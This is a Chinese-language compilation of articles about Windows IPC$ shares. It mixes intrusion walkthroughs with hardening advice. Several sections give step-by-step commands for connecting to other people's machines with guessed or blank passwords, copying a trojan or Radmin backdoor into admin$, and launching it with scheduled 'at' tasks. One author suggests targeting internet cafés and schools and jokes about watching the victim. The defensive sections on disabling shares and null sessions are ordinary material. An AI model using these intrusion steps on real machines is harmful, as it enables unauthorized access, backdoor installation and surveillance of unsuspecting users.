ipc$

合集下载

ipc$共享入侵详细教程

ipc$共享入侵详细教程

ipc$共享入侵详细教程ipc$共享入侵微软在win2000,xp中设置的这个功能对个人用户来说几乎毫无用处。

反而成了黑客入侵nt架构操作系统的一条便利通道。

如果你的操作系统存在不安全的口令,那就更可怕了。

一条典型的入侵流程如下:(1)用任何办法得到一个帐户与口令(猜测,破解),网上流传有一个叫做smbcrack的软件就是利用ipc$来破解帐户口令的。

如果你的密码位数不高,又很简单,是很容易被破解的。

根据我的个人经验,相当多的人都将administrator的口令设为123,2003,或者干脆不设密码。

(2)使用命令net use \\123.1.1.1\ipc$“密码”/user:“用户名”建立一个有一定权限的ipc$连接。

用copy trojan.exe \\xxx.xxx.xxx.xxx\admin$ 将木马程序的服务器端复制到系统目录下。

(3)用net time \\xxx.xxx.xxx.xxx 命令查看对方操作系统的时间,然后用at \\202.xxx.xxx.xxx 12:00 trojan.exe 让trojan.exe在指定时间运行。

这样一来,你的电脑就完全被黑客控制了。

应对措施:禁用server服务, Task Scheduler服务,去掉网络文件和打印机共享前的对勾(插入图1),当然,给自己的帐户加上强壮的口令才是最关键的。

而且在一般情况下,一些功能对管理员来说也是没有必要的。

如果你不需要MS SQL Server 的xp_cmdshell(use sp_dropextendedproc "xp_cmdshell"这项功能就不要把xp_cmdshell extended stored proc(扩展存储过程)命令功能留着。

我们只需要在isql窗口中输入:use mastersp_dropextendedproc 'xp_cmdshell'net use 映射盘符: \\肉鸡IP\肉鸡盘符譬如:net use z: \\1.1.1.1\c (把对方的c盘映射成你的z盘),察看一下开了哪些端口,有445哦,(主要是针对2000系统的)netstat -an命令:net view(有的机器用的是win98的系统查不出的)看一下自己的IP再看看用户:于是可以进行IPC$连接了(关于IPC$空连接的资料你可以上网搜索一下)命令:net use \\220.160.199.38\ipc$ "" /user:Administrator命令:net use \\ip\ipc$ 密码/user:用户net use \\220.160.199.38\ipc$ "" /user:"zyz"显示命令成功可以用这个命令看下是否成功:net use好了,现在我们给他传个咚咚--我配置好的radmin命令:copy 本地文件远程目录如:copy c:\4899.exe \\192.168.0.200\admin$(这里的$是指admin用户的c:\winnt\system32\)传过去了,我们当然要运行它啊,怎么运行呢?接着看现在我们来看看他机器的时间命令:net time \\192.168.0.200然后用这个命令启动at \\192.168.0.200 时间要运行的文件at \\IP 时间要运行的文件(这个是计划任务里边的一个命令)好了,然后呢,嘿嘿----等!看下我们的后门运行了没有?呵呵,上线了我回头看看是哪个MM or GG?我们看看她在干什么?嘿嘿~OK了吧!至于以后你要做什么,就看你了这个方法还可以入侵网吧的主机,其实内网一般都有这个漏洞特别象学校或网吧等地方我试过了,不过,现在偶不搞他好了,到这里了,防范方法在下边,88!防范ipc$入侵:1.禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》) 首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LS A]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)2.禁止默认共享1)察看本地共享资源运行-cmd-输入net share2)删除共享(每次输入一个)net share ipc$ /deletenet share admin$ /deletenet share c$ /deletenet share d$ /delete(如果有e,f,……可以继续删除)3)停止server服务net stop server /y (重新启动后server服务会重新开启)4)修改注册表运行-regeditserver版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\L anmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。

IPC$入侵命令

IPC$入侵命令

入侵中可能会用到的命令为了这份教程的完整性,我列出了ipc$入侵中的一些常用命令,如果你已经掌握了这些命令,你可以跳过这一部分看下面的内容。

请注意这些命令是适用于本地还是远程,如果只适用于本地,你只能在获得远程主机的shell(如cmd,telnet等)后,才能向远程主机执行。

1 建立/删除ipc$连接的命令1)建立空连接:net use \\127.0.0.1\ipc$ "" /user:""2)建立非空连接:net use \\127.0.0.1\ipc$ "密码" /user:"用户名"3)删除连接:net use \\127.0.0.1\ipc$ /del2 在ipc$连接中对远程主机的操作命令1)查看远程主机的共享资源(看不到默认共享):net view \\127.0.0.12)查看远程主机的当前时间:net time \\127.0.0.13)得到远程主机的netbios用户名列表:nbtstat -A 127.0.0.14)映射/删除远程共享:net use z: \\127.0.0.1\c此命令将共享名为c的共享资源映射为本地z盘net use z: /del删除映射的z盘,其他盘类推5)向远程主机复制文件:copy 路径\文件名\\IP\共享目录名,如:copy c:\xinxin.exe \\127.0.0.1\c$即将c盘下的xinxin.exe复制到对方c盘内当然,你也可以把远程主机上的文件复制到自己的机器里:copy \\127.0.0.1\c$\xinxin.exe c:\6)远程添加计划任务:at \\IP时间程序名如:at \\127.0.0.0 11:00 xinxin.exe注意:时间尽量使用24小时制;如果你打算运行的程序在系统默认搜索路径(比如system32/)下则不用加路径,否则必须加全路径3 本地命令1)查看本地主机的共享资源(可以看到本地的默认共享)net share2)得到本地主机的用户列表net user3)显示本地某用户的帐户信息net user 帐户名4)显示本地主机当前启动的服务net start5)启动/关闭本地服务net start 服务名net stop 服务名6)在本地添加帐户net user 帐户名密码/add7)激活禁用的用户net uesr 帐户名/active:yes8)加入管理员组net localgroup administrators 帐户名/add很显然的是,虽然这些都是本地命令,但如果你在远程主机的shell中输入,比如你telnet 成功后输入上面这些命令,那么这些本地输入将作用在远程主机上。

IPC$入侵--远程磁盘映射

IPC$入侵--远程磁盘映射

IPC$入侵:远程磁盘映射IPC$介绍:IPC$是Windows系统特有的一项管理功能,是微软公司为了方便用户使用计算机而设计的,主要用来远程管理计算机的。

但事实上使用这个功能的黑客可以通过建立IPC$连接与远程主机实现通信和控制。

通过IPC$连接的建立,黑客能够做到:1 建立、拷贝、删除远程计算机文件;2 在远程计算机上执行命令。

的缩写,可以理解为“命名管道”资源,它是Windows操作系统提供的一个通信基础,用来在两台计算机进程之间建立通信连接。

而IPC后面的“$”是Windows系统所使用的隐藏符号,因此“IPC$”表示IPC共享,但是是隐藏的共享。

IPC$是Windows NT及Windows 2000/XP/2003特有的一项功能,通过这项功能,一些网络程序的数据交换可以建立在IPC上面,实现远程访问和管理计算机。

打个比方,IPC连接就像是挖好的地道,通信程序就通过这个IPC地道访问目标主机。

默认情况下IPC是共享的,除非手动删除IPC$。

通过IPC$连接,入侵者就能够实现远程控制目标主机。

因此,这种基于IPC的入侵也常常被简称为IPC入侵。

操作系统(不包括Windows 98系列)在安装完成后,自动设置共享的目录为:C盘、D盘、E盘、ADMIN目录(C:\WINNT\)等,即为ADMIN$、C$、D$、E$等等,但要注意,这些共享是隐藏的,只有管理员能够对他们进行远程操作。

演示:在MS-DOS中键入“net share”命令来查看本机共享资源。

如何消除默认共享?DOS命令,这些都是DOS中经常使用的命令。

DIR命令:列出当前路径下的文件,常常用来查看想要找的文件是否在该路径下。

CD命令:进入指定的目录。

比如,想进入E盘中的CODE文件夹,则在E:\>下键入“CD CODE”命令。

:系统账号类操作;net localgroup:系统组操作net use:远程连接、映射操作net send:信使命令net time:查看远程主机系统时间cls命令:清屏命令。

ipc$

ipc$
编辑本段六 ipc 管道在 hack 攻击中的意义
ipc 管道本来是微软为了方便管理员进行远程管理而设计的,但在入侵者看来,开放 ipc 管道的主机似乎更容易得手。通过 ipc 管道,我们可以远程调用一些系统函数(大多通过工具实现,但需要相应的权限),这往往是入侵成败的关键。如果不考虑这些,仅从传送文件这一方面, ipc 管道已经给了入侵者莫大的支持,甚至已经成为了最重要的传输手段,因此你总能在各大论坛上看到一些朋友因为打不开目标机器的 ipc 管道而一筹莫展大呼救命。当然,我们也不能忽视权限在 ipc 管道中扮演的重要角色,想必你一定品尝过空会话的尴尬,没有权限,开启管道我们也无可奈何。但入侵者一旦获得了管理员的权限,那么 ipc 管道这把双刃剑将显示出它狰狞的一面。
查看远程主机的共享资源
2 查看远程主机的共享资源 命令: net view \\ip 解释:前提是建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开了共享,可以得到如下面的结果,但此命令不能显示默认共享。 在 \\*.*.*.* 的共享资源 资源共享名 类型 用途 注释 ----------------------------------------------------------- NETLOGON Disk Logon server share SYSVOL Disk Logon server share 命令成功完成。
网上关于 ipc$ 入侵的文章可谓多如牛毛,攻击步骤甚至已经成为了固化的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄。不过话虽这样说,我认为这些文章讲解的并不详细,一些内容甚至是错误的,以致对 ipc$ 的提问几乎占了各大安全论坛讨论区的半壁江山,而且这些问题常常都是重复的,严重影响了论坛质量和学习效率,因此通过下面文章,希望能把 ipc$ 这部分东西尽量说清楚。 注意:本文所讨论的各种情况均默认发生在 win NT/2000 环境下, win98 将不在此次讨论之列。

ipc$连接在工作生活中的实际应用(内有连接失败的可行解决办法&使用案例一则!)

ipc$连接在工作生活中的实际应用(内有连接失败的可行解决办法&使用案例一则!)

概念IPC$(Internet Process Connection) 是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。

IPC$ 是NT/2000 的一项新功能,它有一个特点,即在同一时间内,两个IP 之间只允许建立一个连接。

NT/2000 在提供了ipc$ 功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(c$,d$,e$ ……) 和系统目录winnt 或windows(admin$) 共享。

所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。

ipc$连接成功后能做什么查看远程主机的共享资源命令:net view \\ip查看远程主机的当前时间命令:net time \\ip得到远程主机的NetBIOS用户名命令:nbtstat -a ip映射远程主机磁盘命令:net use x:\\ip\c$(将远程主机的C盘映射为本机X盘)添加账户、开启服务、关机\重启、复制文件、使用网络注册表、使用计算机管理,等等……还有其他好多功能,在此不一一列举,可在使用中探究。

系统支持Win2000/NT及其以上系统都支持。

命令使用方法与格式在“CMD”命令提示符下使用“net”命令实现。

格式:空连接:net use \\ip\ipc$ "" /user:""带权限连接:net use \\ip\ipc$ "密码" /user:"用户名"删除连接:net use \\ip\ipc$ /del现如今的使用最常见的一个问题在使用ipc$连接时,我们连接的对方是Win2K的话,连接比较方便,只要命令格式没有输错,都能连接使用成功!但若对方是XP\Vista\Win7的话,就算有了对方的IP地址、用户名和密码、必须的系统服务都已启动、命令格式也输对,但还是有可能连接不成功、为什么呢?因为XP及以上系统与2000系统在这个方面有两处不同的地方,仅仅Xp系统的一项权限设置就把你死死的阻止在门外了!需要在被连接方设置,那个权限设置是:本地帐户的共享和安全模式。

IPC$关闭开启

IPC$关闭开启

IPC$是不是无法关闭的?2007-6-18 19:59提问者:look_she|悬赏分:5IPC$是不是无法关闭的?是不是用IPC$可以和任何PC连接?!默认共享:在Windows 2000/XP/2003系统中,逻辑分区与Windows目录默认为共享,这是为管理员管理服务器的方便而设,但却成为了别有用心之徒可趁的安全漏洞。

IPC$IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。

利用IPC$,连接者可以与目标主机建立一个空的连接,即无需用户名和密码就能连接主机,当然这样连接是没有任何操作权限的。

但利用这个空的连接,连接者可以得到目标主机上的用户列表。

利用获得的用户列表,就可以猜密码,或者穷举密码,从而获得更高,甚至管理员权限。

只要通过IPC$,获得足够的权限,就可以在主机上运行程序、创建用户、把主机上C、D、E等逻辑分区共享给入侵者,主机上的所有资料,包括QQ密码、email帐号密码、甚至存在电脑里的信用卡资料都会暴露在入侵者面前。

要防止别人用ipc$和默认共享入侵,需要禁止ipc$空连接,避免入侵者取得用户列表,并取消默认共享。

禁止ipc$空连接进行枚举运行regedit,找到如下组键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001关闭139与445端口ipc$连接是需要139或445端口来支持的,139端口的开启表示netbios协议的应用,通过139,445(win2000)端口实现对共享文件/打印机的访问,因此关闭139与445端口可以禁止ipc$连接。

关闭139端口可以通过禁用 netbios 协议来实现。

IPC$详解

IPC$详解
IPC$详解
一:什么是ipc$
IPC$(Internet Process Connection)是共享 "命名管道 "的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).
2)ipc$与139,445端口:
六:如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)

防范ipc$攻击常用方法

防范ipc$攻击常用方法

防范ipc$攻击常用方法IPC$是Windows系统中的一种共享资源,它允许用户在不需要登录到目标计算机的情况下访问该计算机的资源。

这项功能的存在使得黑客有机会通过IPC$攻击手段获取目标电脑的控制权,威胁到用户的隐私和数据安全。

为了防范IPC$攻击,我们可以采取以下常见方法:1. 禁用IPC$共享IPC$是Windows系统默认开启的一个共享,可以通过它访问目标计算机的资源。

如果我们禁用IPC$共享,黑客就无法使用该方式进行攻击了。

禁用IPC$共享的方法有多种,可以通过修改注册表、关闭服务等方式实现。

其中最常见的方法是在Windows安全策略中禁用IPC$共享。

2. 设置强密码IPC$攻击主要是利用了Windows系统默认的空密码共享漏洞,如果我们设置了强密码,就可以有效地避免IPC$攻击。

强密码应该包含大小写字母、数字和特殊字符,并且长度应该不少于8位。

3. 禁用Guest账户Guest账户是Windows系统默认开启的一个账户,它没有密码限制,可以访问IPC$共享。

为了防范IPC$攻击,我们应该禁用Guest账户,同时建议禁用其他不必要的账户。

4. 安装杀毒软件杀毒软件可以及时发现和清除病毒、木马等恶意软件,有效保护我们的计算机安全。

如果我们安装了杀毒软件,并及时更新病毒库,就可以有效地防范IPC$攻击。

5. 定期更新系统和软件Windows系统和常用软件的更新补丁可以修复系统漏洞和安全隐患,有效提高系统的安全性。

我们应该定期检查系统和软件的更新情况,并及时安装补丁,以保证计算机的安全。

6. 使用防火墙防火墙可以阻止未经授权的访问,有效保护我们的计算机安全。

我们应该开启Windows防火墙,并设置防火墙规则,禁止不必要的入站和出站连接,以防范IPC$攻击等恶意攻击。

7. 关闭不必要的服务和端口Windows系统中有很多不必要的服务和端口,这些服务和端口可能存在安全漏洞,成为黑客攻击的目标。

“恶意”利用IPC$

“恶意”利用IPC$

“恶意”利⽤IPC$“恶意”利⽤IPC$⽬录⽆论是默认共享还是远程计划任务都是管理员级别或是有相对应权限的账户的操作。

何为IPC$IPC$ (Internet Process Connection),共享"命名管道"的资源,它是为了让进程间通信⽽开放的命名管道,通过提供可信任的⽤户名和⼝令,连接双⽅可以建⽴安全的通道并以此通道进⾏加密数据的交换,从⽽实现对远程计算机的访问。

默认共享是管理员级别或者是有相对权限的账户的操作,同时在安全策略中可以对共享模型进⾏修改。

所谓空连接:就是在连接时指定⼀个空的⽤户名和密码net use \\IP\IPC$ "" /user:"",这样的连接是可以建⽴的,但是并没有什么权限。

利⽤IPC$⽹上多数通过IPC$进⾏攻击的例⼦都是通过远程主机开放的默认共享⽂件夹,上传⼀个⽊马⽂件,通过at命令添加计划任务的⽅式执⾏,这样可以直接得到⼀个SYSTEM权限的Shell。

但是这⾥也有⼀个要求,就是IPC$这个默认共享存在,如果对⽅主机把IPC$删除了,那么虽然可以上传⽂件,但是却没有办法通过at命令设置计划任务。

流程记录如下:1. net use \\靶机IP(或者计算机名)\ipc$探测使⽤⾃⼰的⽤户名和密码能不能连到远程主机(默认情况下该命令会使⽤当前⽤户的账户和密码进⾏尝试)2. 拷贝⽊马copy ⽊马⽂件 \\靶机\靶机路径3. at \\靶机IP 时间⽊马win7以后的版本执⾏at命令时执⾏会报:“AT命令已弃⽤,请改⽤schtasks.exe ”,不要理他,⾄少在2012之前的版本(包括2012R2)是能⽤的1. AT命令创建的任务权限为SYSTEM,也就是说shell跑起来就是SYSTEM。

2. AT命令创建的任务⼯作模式是:⽆论⽤户是否登陆都执⾏该计划任务。

3. schtasks这个命令在远程主机上创建任务时,需要⼀个在远程主机Administrators组中的⽤户。

关于计算机中的部分专用词汇解释

关于计算机中的部分专用词汇解释

关于计算机中的部分专用词汇解释1)什么是IPC:IPC是英文INTERNET PROCE CONNECTION的缩写,在计算机中可以理解为“命名管道”资源,它是WINDOWS操作系统提供的一个通信基础,用来在两台计算机之间产生连接或是联系,实际上它就是在计算机之间相当于安装了一路功能强大的管道。

2)什么是ipc$:ipc$是Windows系统使用的隐藏符号,表示是Windows系统之间的ipc$则表示是IPC共享是隐藏的的共享,通过这项功能,一些网络程序的数据交换就可以建立在IPC上面,从而实现远程管理和访问计算机,但是如果通过ipc$连接也会给入侵者提供实现远程控制目标主机,入侵者也常常被简称为IPC入侵。

3)什么是TLNET::对计算机来说TELNET只是一种通信协议(远程登陆工具),但是入侵者可以利用它来作为一种远程登陆工具实现远程控制目标上的主机上的软件,硬件资源,主要是用来获取远程主机的管理员权限。

4)什么是bit: 通常在数据的传输过程中bit主要是指数据在同一时间周期内传输的数据量,在国际的数据传输过程中对数据量都有一定的规定如8bit,16bit,32bit应该说不同的bit率就是不同的数据包。

5)什么是ping:ping实际上就是拼网络上的ip地址,可以查询本地计算机连接的广域网和局域网上的ip也就是说如果网络连接不上这是最有效的办法之一,这是TCP/IP协议中最有用的命令之一它给另一个系统发送一系列的数据包,该系统本身又发回一个响应,这条实用程序对查找远程主机很有用,它返回的结果表示是否能到达主机,宿主机发送一个返回数据包需要多长时间,例如:-t Ping the specifed host until interrupted.(除非人为中止,否则一直ping下去)-a Resolve addresses to hostnames.(把IP转为主机名)-n count Number of echo requests to send.(响应请求的数量)-l size Send buffer size.(封包的大小)-f Set Don't Fragment flag in packet.(信息包中无碎片)-i TTL Time To Live.(时间)-v TOS Type Of Service.(服务类型)-r count Record route for count hops.-s count Timestamp for count hops.-j host-list Loose source route along host-list.-k host-list Strict source route along host-list.-w timeout Timeout in milliseconds to wait for each reply.(timeout的时间)6)什么是bat:bat是Windows系统中的用记事本编写的一种文件格式,统称为dos批处理文本格式,也就是说在记事本里写入一系列的dos命令按先后顺序执行其dos命令就会让Windows来执行其命令,相当于利用了dos命令。

《网络攻击与防御》专题-1:IPC$漏洞详解

《网络攻击与防御》专题-1:IPC$漏洞详解
net time \\<IP> 【得到对方时间】 at \\<IP> <指定时间> nc -l -p <端口号 > -t -e cmd.exe 【使对方在<指定时间>启 动DOS窗口,并输出到对方的<端口号>端 口。】
闪击:连接
地狱之门:登录到定时炸弹炸开的端口得 到一个shell(命令窗口) telnet <IP> <端口号>
不要高兴得太早:权限不够
渗透:提权
漏洞之后的漏洞 NT核心进程WinLogon可被非法使用, 用
来把任何用户加入管理员组。
王牌出场:运行提权程序 把提权程序getadmin.exe,gasys.dll拷到z 盘,再在shell中执行getadmin.exe。
当家作主:破坏
篡改主页 上传木马 格式化硬盘
穷举密码
IPC$漏洞
广州科技职业技术学院 黄伟
什么是IPC$?
在win NT/2000环境下 , IPC$(Inter-Process Communication),它是为了让进程间网络 通信而开放的主机间的连接。通过提供可 信任的用户名和口令,连接双方可以建立 安全的通道并以此通道进行加密数据的交 换,从而实现对远程计算机的访问。
越界:映射对方机器其他共享(例如 admin$)到本机(例如Z盘) net use z: \\<IP>\admin$
闪击:连接
瑞士军刀:上传木马程序 把黑客工具nc.exe拷到z盘 把通用DOS命令窗口工具cmd.exe拷到z盘
闪击:连接
定时炸弹:向对方机器添加定时任务,在 给定时间启动cmd.exe, 并把界面输出到指 定端口。
打扫战场:痕迹清理

建立IPC$连接

建立IPC$连接

建立IPC$连接
、建立IPC$连接:
命令行下输入:
net use \\IP\IPC$ "password" /user:"administrator"
2、管理远程计算机:
计算机管理——连接到另一台计算——输入ip
连接成功,想怎么改就怎么改。

(注意:由防火墙的时候可能有些服务启动不了,比如telnet)
二、通过“bat文件”和“计划任务”开启远程主机服务
1、同上建立IPC$连接
2、编写bat文件,以开启telnet服务为例:
打开记事本,键入“net start telnet”,另存为tel.bat
3、将tel.bat复制到目标远程主机上:
copy tel.bat \\ip\path
4、察看远程主机时间
net time \\ip
5、建立计划任务
at \\ip time tel.bat
(注意:这种方法只能开启类型为“手动”的服务)
三、使用工具netsvc.exe开启远程服务
命令格式:netsvc \\ip svc /start svc为预开启的服务名称netsvc.exe是微软公司NT系统中附带的一个管理工具,用于开启远程主机上的服务,无须开远程主机的计划任务服务。

今天先写到这里。

IPC$攻击与防护

IPC$攻击与防护

一、什么是ipc$IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。

利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。

我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。

所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限, 从而达到不可告人的目的.解惑:1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数,所以不能在Windows 9.x中运行。

也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)2)即使是空连接也不是100%都能建立成功,如果你关闭了ipc$共享,对方仍然无法建立连接3)并不是说建立了ipc$连接就可以查看用户列表,因为管理员可以禁止导出用户列表二、建立ipc$连接在hack攻击中的作用就像上面所说的,即使建立了一个空的连接,也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果能够以某一个具有一定权限的用户身份登陆的话,那么就会得到相应的权限,显然,如果以管理员身份登陆,嘿嘿,就不用我在多说了吧!!(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以开启终端服务方便控制.怎么样?够厉害吧!)不过管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的因此最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,根本就无法连接.三、 ipc$与空连接,139,445端口,默认共享的关系以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)1)ipc$与空连接:不需要用户名与密码的ipc$连接即为空连接,一旦以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了. 当以空连接登陆时,没有任何权限,而以用户或管理员的身份登陆时,就会有相应的权限.2)ipc$与139,445端口:ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.3)ipc$与默认共享默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)四、 ipc$连接失败的原因以下5个原因是比较常见的:1)HACKER的系统不是NT或以上操作系统;2)被攻击者没有打开ipc$默认共享3)被攻击者未开启139或445端口(或被防火墙屏蔽)4)HACKER的命令输入有误(比如缺少了空格等)5)用户名或密码错误(空连接当然无所谓了)另外,你也可以根据返回的错误号分析原因:错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;错误号51,Windows 无法找到网络路径 : 网络有问题;错误号53,找不到网络路径: ip地址错误;目标未开机;目标lanmanserver 服务未启动;目标有防火墙(端口过滤);错误号67,找不到网络名:你的lanmanworkstation服务未启动;目标删除了ipc$;错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连。

4-2-IPC$入侵(共12张)

4-2-IPC$入侵(共12张)
第11页,共12页。
补充二:在XP系统(xìtǒng)下能否使用IPC$连接?
通过上网查找有关资料并试验,看看在XP系统 下,还能否使用IPC$连接进行文件共享和远程管理?
第12页,共12页。
第4页,共12页。
2、入侵过程(前提:获取对方主机的IP、管理员帐号密 码等信息) 1)进入DOS模式
2)建立IPC$连接
Net use \\IP\IPC$ “PASSWord” /user:“UserName”
3)映射磁盘
Net use z: \\IP\盘符$
4)打开“资源管理器”,进行(jìnxíng)文件的查找、复制等 操作。 5)断开连接
在 WindowsNT 中 SMB 基于 NBT 实现,即使用 139 ( TCP )端口;而在 Windows2000 中, SMB 除了基于 NBT 实现,还可以直接通过 445 端口实现。
Windows系统默认会设置共享目录,这些共享是隐藏 的,只有管理员能够对他们进行远程操作。
在MS-DOS中键入“net share”命令可查看本机共 享资源。
Net send 10.10.49.3 你好 也可以使用对方的机子向其他的机子发送虚假信息 at //10.10.49.3 1:00 net send 10.10.49.2 你好
IPC连接的终极目的: 打开对方的TELNET 以TELNET方式登录对方电脑 直接控制对方电脑 AT //10.10.49.3 1:00 SC CONFIG TLNTSVR START= AUTO AT //10.10.49.3 1:00 net start telnet
中不包含空格时两边的双引号可以省略,如果密码为空, 可以直接输入两个引号“”即可;
10 如果在已经建立好连接的情况下对方重启计算机, 那么ipc$连接将会自动断开,需要重新建立连接。

IPC$连接出错的解决方法

IPC$连接出错的解决方法

IPC$连接出错的解决方法 use发生系统错误1219该操作及错误显示信息如下:C:\Documents and Settings\gonghang>net use "11" /user:"23"发生系统错误1219。

不允许一个用户使用一个以上用户名与一个服务器或共享资源的多重连接。

中断与此服务器或共享资源的所有连接,然后再试一次...出现这种情况是因为你已经用一个用户与该机器建立了一个IPC 连接,同一时间你只能用一个账户来与一个机器来建立连接解决方法如下:用net use命令可以查看你当前与网络资源的连接,例如驱动器映射、IPC连接。

使用该命令后,应该可以看到本机和哪些服务器或共享资源有资源连接。

把你现在要访问的共享资源的连接断掉:如“net use 192.168.1.1 /del ”这个命令,重新连接就可以了;或者用“net use * /del /y”命令中断开所有连接。

注意:如果你的来宾账户开启了,并且没有拒绝Guest从网络访问,那么在IPC连接时你输入任意的用户名和密码都能够建立连接,这时你是以Guset用户连接的。

所以连接成功并不表示你输入的用户名和密码正确 use发生系统错误5该操作及错误显示信息如下:C:\Documents and Settings\gonghang>net use密码在无效。

要连接abc\Guest 到xxx.xxx.xxx.xxx,按ENTER,或输入一个新的用户名: abc输入xxx.xxx.xxx.xxx的密码:发生系统错误 5。

拒绝访问。

出现这种情况应为远程登陆时的默认帐号相关原因,因为你的网络访问设置的仅来宾,所有用户都会映射为Guest用户来登录,即使你输入了新的用户名还是以Guest 用户来登录的。

解决方法如下:1.开始-->运行-->gpedit.msc2.计算机配置-->Windows设置-->安全设置-->本地策略-->安全选项-->网络访问:本地帐户的共享和安全模式3.改为经典模式,该模式允许本地用户使用自己的身份进行认证。

如何关闭IPC$共享?

如何关闭IPC$共享?

如何关闭IPC$共享?个人的经历,以下几种种方法可以参考一下:A.修改注册表,去除默认共享(WIN2000)1.在注册表编辑器(regedit.exe)中依次找到“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\l anmanserver\parameters”,之后在其下新建一个“双字节值”,取名为AutoShareWks,并将其值设为“0”.2. 在注册表中找到如下键:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control \LSA将RestrictAnonymous 项设置为1B、关闭系统服务!(WIN2000/XP)如果你是单机上网,平时不用在局域网共享文件或打印机、相互访问的话,控制面板--管理工具--服务,停止"server"服务,并禁用。

根据我自己经验,这条比较管用。

在盘符上点右键连“共享”的选项也没了,管理工具-计算机管理-共享文件夹也会打不开,提示“未启动相关服务”。

1、这种办法是在 CMD(命令提示符)中进行关闭,如下:net share ipc$ /delnet share admin$ /delnet share c$ /del…………(有几个删几个)2,禁止建立空连接步骤如下首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA] 把RestrictAnonymous(DWORD)的键值改为:00000001。

IPC$共享是为管理系统而设置的,关闭之后,当机器下次重新启动的时候,会自动重建。

也就是说,IPC$共享无法彻底关闭,这是系统的需要。

